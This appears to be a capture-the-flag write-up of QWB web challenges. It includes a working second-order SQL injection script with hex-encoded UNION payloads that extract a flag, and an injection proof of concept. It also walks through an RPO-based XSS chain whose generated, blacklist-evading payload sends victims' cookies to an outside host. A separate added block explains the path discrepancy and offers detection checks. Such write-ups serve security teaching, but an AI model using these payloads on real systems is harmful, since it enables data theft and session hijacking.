Easter egg
The real Easter egg
The postgresql configuration had not been changed, so it was a UDF getshell.
Three hit
An obvious second-order injection.
```python
# -*- coding:utf-8 -*-
import sys
import requests
from binascii import b2a_hex as b2a
from bs4 import BeautifulSoup

# select * from users where age = 1 union select 1,2,3,4,5#
# Payloads tried (hex-encoded so they survive the age field) and what came back:
'''
1 order by 1#
0x31206f72646572206279203123
1 order by 2#
0x31206f72646572206279203223
1 order by 3#
0x31206f72646572206279203323
1 order by 4#
0x31206f72646572206279203423
1 order by 5#
0x31206f72646572206279203523
4
qwb
qwb@localhost
'bertrams' union select 1,(select TABLE_NAME from information_schema.tables where table_schema='qwb' limit 0,1),3,4 limit 0,1#
0x276265727472616d732720756e696f6e2073656c65637420312c2873656c656374205441424c455f4e414d452066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d2771776227206c696d697420302c31292c332c34206c696d697420302c3123
<a>flag</a>
'bertrams' union select 1,(select column_name from information_schema.columns where table_name='flag' limit 0,1),3,4 limit 0,1#
0x276265727472616d732720756e696f6e2073656c65637420312c2873656c65637420636f6c756d6e5f6e616d652066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f6e616d653d27666c616727206c696d697420302c31292c332c34206c696d697420302c3123
<a>flag</a>
'bertrams' union select 1,(select flag from flag limit 0,1),3,4 limit 0,1#
0x276265727472616d732720756e696f6e2073656c65637420312c2873656c65637420666c61672066726f6d20666c6167206c696d697420302c31292c332c34206c696d697420302c3123
<a>QWB{M0b4iDalao0rz0rz}</a>
'''


def reg(i, sqli):
    """Register user i; the payload is stored in the age field (first query)."""
    regurl = "http://39.107.32.29:10000/index.php?func=register"
    data = {'username': str(i), 'age': sqli, 'password': '123456'}
    resp = requests.post(regurl, data=data)
    # print(resp.content)


def log(i):
    """Log in as user i; the stored age value is reused in the second query."""
    logurl = "http://39.107.32.29:10000/index.php?func=login"
    data = {'username': str(i), 'password': '123456'}
    resp = requests.post(logurl, data=data)
    return resp.content


for i in range(1, 2):
    sqli = "'bertrams' union select 1,(select flag from flag limit 0,1),3,4 limit 0,1#"
    print(sqli)
    # send the payload as a 0x hex literal so no quotes are needed in the age field
    sqli = "0x" + b2a(sqli.encode()).decode()
    print(sqli)
    i = "bertram8" + str(i)
    reg(i, sqli)
    content = log(i)
    soup = BeautifulSoup(content, "html.parser")
    flag = soup.find_all('a')[2]
    print(flag)
```
Python is the best language 1
http://39.107.32.29:20000
http://117.50.16.51:20000
Download link
Backup download link (password: rtou)
I'm learning the flask recently,and I think python is the best language in the world!don't you think so?
My feeling was that a careful pass through the code would certainly turn up an injection.
First, follow routes.py.
The forms there use wtforms validation rules.
The regular-expression filter is not strict: characters such as single quotes also match the regex, so there is an injection here.
Then, following further in:
Based on the sql class, we pick out the string-concatenation part and inject our attack string there.
Another injection point.
The first point can be triggered directly at registration.
For the second point, register and log in, then post an article.
PoC for the second point:
'|conv(hex(substr(user(),1,8)),16, 10)|'
Data retrieved successfully.
Share your mind
http://39.107.33.96:20000/index.php
First: register --> login.
Please help me find the vulnerability before I finish this site!
hint: the xss bot uses phantomjs, version 2.1.1
hint2: the xss point is not on the report page
So this is XSS.
Features: write article, Reports
write article: you can submit posts
Reports: you can submit bug links
Attack
So the attack chain is to construct an XSS payload and submit it to report.
But the write article feature has a blacklist; fuzzing shows that characters such as <"&' are filtered.
That rules out conventional XSS. Looking at the source, the js references and the css references are written differently, which brings to mind the RPO challenge that 小m set on pwnhub.
The difference is that most published RPO attack examples use css, while this challenge uses js. css is easy to exploit because its parsing is lenient; js is parsed strictly, so whatever gets loaded as a js file has to be syntactically valid.
The first problem to solve is getting rid of the html tags in the article.
If the title field is left blank you get a plain-text input box.
The second problem is how to use RPO to fool the client.
Relative path of the js being loaded:
../static/js/jquery.min.js
Attack link:
http://39.107.33.96:20000/index.php/view/article/631/bertram/..%2f..%2f../
Apache server side (normal request):
http://39.107.33.96:20000/index.php/view/article/631/bertram/../../../../static/js/jquery.min.js
Client side:
http://39.107.33.96:20000/index.php/view/article/631/bertram/..%2f..%2f../../static/js/jquery.min.js
The client treats ..%2f..%2f.. as a single directory level and therefore does not climb out of it, so the request the client actually makes is
http://39.107.33.96:20000/index.php/view/article/631/bertram/static/js/jquery.min.js
Submitting that link then completes the attack.
Generating the attack exploit
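As an added illustration (not code from the original writeup), the path-resolution discrepancy just described, using Python's RFC 3986 urljoin for the browser side and decode-then-normalise for the server side; the server model is an assumption, and the URLs are the writeup's own.

```python
# Added example: why browser and server disagree about the same URL (the
# core of the RPO trick above). Server behaviour is modelled as
# "percent-decode, then remove dot segments" (an assumption, not verified
# against this Apache setup); the URLs below are the writeup's own.
import posixpath
from urllib.parse import urljoin, urlsplit, unquote

PAGE = "http://39.107.33.96:20000/index.php/view/article/631/bertram/..%2f..%2f../"
REL_SCRIPT = "../static/js/jquery.min.js"   # relative <script src> in the page
NAIVE_JOIN = PAGE + REL_SCRIPT               # the writeup's "client" line, unresolved


def browser_resolve(page_url, rel):
    """RFC 3986 resolution as browsers do it: '%2f' is just a character in
    one segment, so '..%2f..%2f..' is a directory *name*; only the literal
    '../' from the script path climbs, and it climbs over that name."""
    return urljoin(page_url, rel)


def server_decoded(url):
    """What a server that percent-decodes the path before routing sees:
    every '%2f' becomes a real '/', so the same URL climbs four levels."""
    s = urlsplit(url)
    return "%s://%s%s" % (s.scheme, s.netloc, unquote(s.path))


def has_encoded_dot_segments(url):
    """Detection: does percent-decoding change how dot segments normalise?
    True for paths that only turn into '../' after decoding."""
    path = urlsplit(url).path
    return posixpath.normpath(unquote(path)) != posixpath.normpath(path)


def is_rpo_safe_src(src):
    """Mitigation: script/style references that do not depend on the
    document's path (root-relative or absolute) cannot be redirected
    by padding the page URL with fake directory levels."""
    return src.startswith("/") or urlsplit(src).scheme in ("http", "https")


if __name__ == "__main__":
    print("browser requests :", browser_resolve(PAGE, REL_SCRIPT))
    print("server decodes to:", server_decoded(NAIVE_JOIN))
    print("encoded dot segs :", has_encoded_dot_segments(NAIVE_JOIN))
    print("src safe?        :", is_rpo_safe_src(REL_SCRIPT),
          is_rpo_safe_src("/static/js/jquery.min.js"))
```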
```python
# -*- coding:utf-8 -*-
# The article body must avoid the blacklisted characters < " & ', so the
# payload is emitted as eval(String.fromCharCode(...)): digits and commas only.
s = 'var iframe=document.createElement("iframe");iframe.src="/QWB_fl4g/QWB/";iframe.onload=function(){location.href="http://45.63.4.90:8080/"+escape(window.top.frames[0].document.cookie);};document.body.appendChild(iframe);'
print("eval(String.fromCharCode(" + ",".join(str(ord(c)) for c in s) + "))")
```
Submit the attack link.
The hit carrying the cookie arrives.
Visit the flag page through the iframe, then grab the flag.